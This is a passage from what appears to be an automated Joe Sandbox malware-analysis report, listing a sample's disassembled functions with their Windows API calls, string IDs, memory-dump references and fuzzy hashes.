                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00E69666
                                            • _wcscmp.LIBCMT ref: 00E69678
                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E696F3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ClassMessageNameParentSend_wcscmp
                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                            • API String ID: 1704125052-3381328864
                                            • Opcode ID: 3080a2330bd4acbf006af5248f1003e45e79c177118b7854a87f4a3bc7cd7c0d
                                            • Instruction ID: 6fe1fe49f2e67c6ab987e956fb13fd84559b38d65f7a23b36ec4a936c882741a
                                            • Opcode Fuzzy Hash: 3080a2330bd4acbf006af5248f1003e45e79c177118b7854a87f4a3bc7cd7c0d
                                            • Instruction Fuzzy Hash: A111A776288307BAEA012631EC0EDEAB79C9B057B4F20202BF910F50D3FE7269518658
                                            Function 00E74189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • __swprintf.LIBCMT ref: 00E7419D
                                            • __swprintf.LIBCMT ref: 00E741AA
                                              • Part of subcall function 00E338D8: __woutput_l.LIBCMT ref: 00E33931
                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 00E741D4
                                            • LoadResource.KERNEL32(?,00000000), ref: 00E741E0
                                            • LockResource.KERNEL32(00000000), ref: 00E741ED
                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 00E7420D
                                            • LoadResource.KERNEL32(?,00000000), ref: 00E7421F
                                            • SizeofResource.KERNEL32(?,00000000), ref: 00E7422E
                                            • LockResource.KERNEL32(?), ref: 00E7423A
                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00E7429B
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                            • String ID:
                                            • API String ID: 1433390588-0
                                            • Opcode ID: 3dec4e8c6ebec2fe3a1259912a76627eda885e61a64533886c8d78dc6ab544cb
                                            • Instruction ID: c0eedbdaa4715028ceecbc796ffb4849316f1305c322659509928915f8d9f369
                                            • Opcode Fuzzy Hash: 3dec4e8c6ebec2fe3a1259912a76627eda885e61a64533886c8d78dc6ab544cb
                                            • Instruction Fuzzy Hash: E23182B160525AAFDB119F61EC48EBB7BACEF04305F048526FD05F21A1E770DA61CBA1
                                            Function 00E716DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentThreadId.KERNEL32 ref: 00E71700
                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E70778,?,00000001), ref: 00E71714
                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00E7171B
                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E70778,?,00000001), ref: 00E7172A
                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E7173C
                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E70778,?,00000001), ref: 00E71755
                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E70778,?,00000001), ref: 00E71767
                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E70778,?,00000001), ref: 00E717AC
                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E70778,?,00000001), ref: 00E717C1
                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E70778,?,00000001), ref: 00E717CC
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                            • String ID:
                                            • API String ID: 2156557900-0
                                            • Opcode ID: 56bf365925761e3fd6be0174bf4563767acdf6c98d559eae6cbf7c82347f5ad9
                                            • Instruction ID: bc02e558fc2dc833f63450bb76656fe7d1a287c9b5041bbb8744c69edeed6211
                                            • Opcode Fuzzy Hash: 56bf365925761e3fd6be0174bf4563767acdf6c98d559eae6cbf7c82347f5ad9
                                            • Instruction Fuzzy Hash: 8C31B175601304BFDB259F1AEC84B6937ADEB16715F108097F808F62A0E7709D488B50
                                            Function 00E89428 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Variant$ClearInit$_memset
                                            • String ID: ,,$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                            • API String ID: 2862541840-218231672
                                            • Opcode ID: 88eba7c16981577697f16f25727fedff5f94754f847d02ed82044536ce51c5ac
                                            • Instruction ID: 791923c465a44a0aeae90ecba8ee5d2c1ccdbc928d9957b77c5e8884c108ba15
                                            • Opcode Fuzzy Hash: 88eba7c16981577697f16f25727fedff5f94754f847d02ed82044536ce51c5ac
                                            • Instruction Fuzzy Hash: 89919E71E00219ABDF24EFA5C844FAEB7B8EF85314F189159E51DBB241D7709905CFA0
                                            Function 00E6A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                            Download Yara Rule
                                            APIs
                                            • EnumChildWindows.USER32(?,00E6AA64), ref: 00E6A9A2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ChildEnumWindows
                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                            • API String ID: 3555792229-1603158881
                                            • Opcode ID: a355a07cbd180c4fe46e869c8f948fb4a3512cff53bedb6c0f1e69170a0ec26c
                                            • Instruction ID: 59c04fef88989910aee9d8f6c7321deffa25a15922cf5c83593671be6f43632e
                                            • Opcode Fuzzy Hash: a355a07cbd180c4fe46e869c8f948fb4a3512cff53bedb6c0f1e69170a0ec26c
                                            • Instruction Fuzzy Hash: 0F91C830E40206EBDB08DF60E486BE9FBB5BF44344F54A129D89AB7141DF30699ACF91
                                            Function 00E12E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SetWindowLongW.USER32(?,000000EB), ref: 00E12EAE
                                              • Part of subcall function 00E11DB3: GetClientRect.USER32(?,?), ref: 00E11DDC
                                              • Part of subcall function 00E11DB3: GetWindowRect.USER32(?,?), ref: 00E11E1D
                                              • Part of subcall function 00E11DB3: ScreenToClient.USER32(?,?), ref: 00E11E45
                                            • GetDC.USER32 ref: 00E4CF82
                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E4CF95
                                            • SelectObject.GDI32(00000000,00000000), ref: 00E4CFA3
                                            • SelectObject.GDI32(00000000,00000000), ref: 00E4CFB8
                                            • ReleaseDC.USER32(?,00000000), ref: 00E4CFC0
                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E4D04B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                            • String ID: U
                                            • API String ID: 4009187628-3372436214
                                            • Opcode ID: fc523f5369e166b58d2035a2e0f85844cb444a8d35ff099f669360207b812552
                                            • Instruction ID: ea71614496f2caff729de171d6c9f350bdde288411e06993ce0885bc7c1f73ae
                                            • Opcode Fuzzy Hash: fc523f5369e166b58d2035a2e0f85844cb444a8d35ff099f669360207b812552
                                            • Instruction Fuzzy Hash: E971E430505205DFCF218F64DC80AEA3BB6FF49318F24526AEE55BB2A6C7318C95DB60
                                            Function 00E88F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E9F910), ref: 00E8903D
                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E9F910), ref: 00E89071
                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E891EB
                                            • SysFreeString.OLEAUT32(?), ref: 00E89215
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                            • String ID:
                                            • API String ID: 560350794-0
                                            • Opcode ID: bafefb0900d32fdec1c24c58200dda567b94eab5dd0633423e2165ec7189f978
                                            • Instruction ID: c0ef7a0b865027fbe4bd972df0dca4739d2f0d53d1d697e1c47fcc85d88ad343
                                            • Opcode Fuzzy Hash: bafefb0900d32fdec1c24c58200dda567b94eab5dd0633423e2165ec7189f978
                                            • Instruction Fuzzy Hash: A6F11871A00209EFDB04EF94C888EBEB7B9BF49314F149059F919BB252DB31AE45CB50
                                            Function 00E8F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00E8F9C9
                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E8FB5C
                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E8FB80
                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E8FBC0
                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E8FBE2
                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E8FD5E
                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00E8FD90
                                            • CloseHandle.KERNEL32(?), ref: 00E8FDBF
                                            • CloseHandle.KERNEL32(?), ref: 00E8FE36
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                            • String ID:
                                            • API String ID: 4090791747-0
                                            • Opcode ID: 7216cada394d1687c2ee3c643b274e6cbb5bc6decec991e0d384822ac0e682ff
                                            • Instruction ID: 2cf723c908d2e1a4cf791a3b0ea0c68b2d92cd2c869c11c9ff4cbc4e2e40f144
                                            • Opcode Fuzzy Hash: 7216cada394d1687c2ee3c643b274e6cbb5bc6decec991e0d384822ac0e682ff
                                            • Instruction Fuzzy Hash: 8EE1B131204341DFCB14EF24C495B6ABBE1AF84354F14A96DF99EAB2A2DB31DC44CB52
                                            Function 00E74F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E748AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E738D3,?), ref: 00E748C7
                                              • Part of subcall function 00E748AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E738D3,?), ref: 00E748E0
                                              • Part of subcall function 00E74CD3: GetFileAttributesW.KERNEL32(?,00E73947), ref: 00E74CD4
                                            • lstrcmpiW.KERNEL32(?,?), ref: 00E74FE2
                                            • _wcscmp.LIBCMT ref: 00E74FFC
                                            • MoveFileW.KERNEL32(?,?), ref: 00E75017
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                            • String ID:
                                            • API String ID: 793581249-0
                                            • Opcode ID: fca6dc3620fa4a4d469f4da7c5276af90d2b02c9a0710a00ba2dd5a1c3c61e8a
                                            • Instruction ID: 788079a92117e6342f8c5896315efe181dc3735bc57fa1ac7568c284b023acad
                                            • Opcode Fuzzy Hash: fca6dc3620fa4a4d469f4da7c5276af90d2b02c9a0710a00ba2dd5a1c3c61e8a
                                            • Instruction Fuzzy Hash: 5B5186B25087849BC724DB60C8859DFB7ECAF85301F00592FF289E7191EF74A188CB66
                                            Function 00E988B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                            Download Yara Rule
                                            APIs
                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E9896E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: InvalidateRect
                                            • String ID:
                                            • API String ID: 634782764-0
                                            • Opcode ID: d2220c0868f8b2199d9ddd61385622987e8f4eb9cae9d60799e31721de1243f8
                                            • Instruction ID: 2d1ae66adb40fed1a30a69cf54c4177e6fa0bb922cbd9df0e1eaded93ffd50a5
                                            • Opcode Fuzzy Hash: d2220c0868f8b2199d9ddd61385622987e8f4eb9cae9d60799e31721de1243f8
                                            • Instruction Fuzzy Hash: 9351A030600308BFDF349F29CE85BA93BA5AB06364F606117F515F62B1DFB1A990CB91
                                            Function 00E12B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E4C547
                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E4C569
                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E4C581
                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E4C59F
                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E4C5C0
                                            • DestroyIcon.USER32(00000000), ref: 00E4C5CF
                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E4C5EC
                                            • DestroyIcon.USER32(?), ref: 00E4C5FB
                                              • Part of subcall function 00E9A71E: DeleteObject.GDI32(00000000), ref: 00E9A757
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                            • String ID:
                                            • API String ID: 2819616528-0
                                            • Opcode ID: d58e3e91fc738abd2d59d22e8b88734e444861904a489449f9c30075f734b774
                                            • Instruction ID: d412b1d91535559efb924e23c530a00af25e2e5fe1090fab8d867d4cf0b0425d
                                            • Opcode Fuzzy Hash: d58e3e91fc738abd2d59d22e8b88734e444861904a489449f9c30075f734b774
                                            • Instruction Fuzzy Hash: 79515674601209AFDB24DF25DC45FAA77B5EB48314F20552AFA02F72A0DB74EDA0DB90
                                            Function 00E68E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E68A84,00000B00,?,?), ref: 00E68E0C
                                            • HeapAlloc.KERNEL32(00000000,?,00E68A84,00000B00,?,?), ref: 00E68E13
                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E68A84,00000B00,?,?), ref: 00E68E28
                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00E68A84,00000B00,?,?), ref: 00E68E30
                                            • DuplicateHandle.KERNEL32(00000000,?,00E68A84,00000B00,?,?), ref: 00E68E33
                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E68A84,00000B00,?,?), ref: 00E68E43
                                            • GetCurrentProcess.KERNEL32(00E68A84,00000000,?,00E68A84,00000B00,?,?), ref: 00E68E4B
                                            • DuplicateHandle.KERNEL32(00000000,?,00E68A84,00000B00,?,?), ref: 00E68E4E
                                            • CreateThread.KERNEL32(00000000,00000000,00E68E74,00000000,00000000,00000000), ref: 00E68E68
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                            • String ID:
                                            • API String ID: 1957940570-0
                                            • Opcode ID: 20ba4a49b930607b5f00bc6b52943aa261c75ecc484b29a4a27cb217f172c35e
                                            • Instruction ID: efd87ff0bfc04d40f0e151596034f96cdc3e815ae72fc2ab9b599ecb03769aed
                                            • Opcode Fuzzy Hash: 20ba4a49b930607b5f00bc6b52943aa261c75ecc484b29a4a27cb217f172c35e
                                            • Instruction Fuzzy Hash: 8201BF75641304FFE710AB66DC4DF5B3B6CEB89711F104422FA05EB1A2CA71D804CB64
                                            Function 00E89A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E67652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E6758C,80070057,?,?,?,00E6799D), ref: 00E6766F
                                              • Part of subcall function 00E67652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E6758C,80070057,?,?), ref: 00E6768A
                                              • Part of subcall function 00E67652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E6758C,80070057,?,?), ref: 00E67698
                                              • Part of subcall function 00E67652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E6758C,80070057,?), ref: 00E676A8
                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00E89B1B
                                            • _memset.LIBCMT ref: 00E89B28
                                            • _memset.LIBCMT ref: 00E89C6B
                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00E89C97
                                            • CoTaskMemFree.OLE32(?), ref: 00E89CA2
                                            Strings
                                            • NULL Pointer assignment, xrefs: 00E89CF0
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                            • String ID: NULL Pointer assignment
                                            • API String ID: 1300414916-2785691316
                                            • Opcode ID: eb7fd52cedd98360dee091a48d03103cd3883385eebf4641f2e7553a9681c0f4
                                            • Instruction ID: fc81be394b22f2a90edb5c445e5b7d035c91f51f6a88ef20a4901d7024182f10
                                            • Opcode Fuzzy Hash: eb7fd52cedd98360dee091a48d03103cd3883385eebf4641f2e7553a9681c0f4
                                            • Instruction Fuzzy Hash: 6A915871D00229EBDB10DFA4DC85AEEBBB9BF08710F24515AF519B7281DB715A44CFA0
                                            Function 00E96FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E97093
                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00E970A7
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E970C1
                                            • _wcscat.LIBCMT ref: 00E9711C
                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E97133
                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E97161
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window_wcscat
                                            • String ID: SysListView32
                                            • API String ID: 307300125-78025650
                                            • Opcode ID: 4ff7861d06d7ab421269915a2de1f27044af90def7d6faa162b72154c4d0752c
                                            • Instruction ID: 02fb4124131345bdccb4b345fbaa38904b62af0a1f4064833b78b2d56df4a9e7
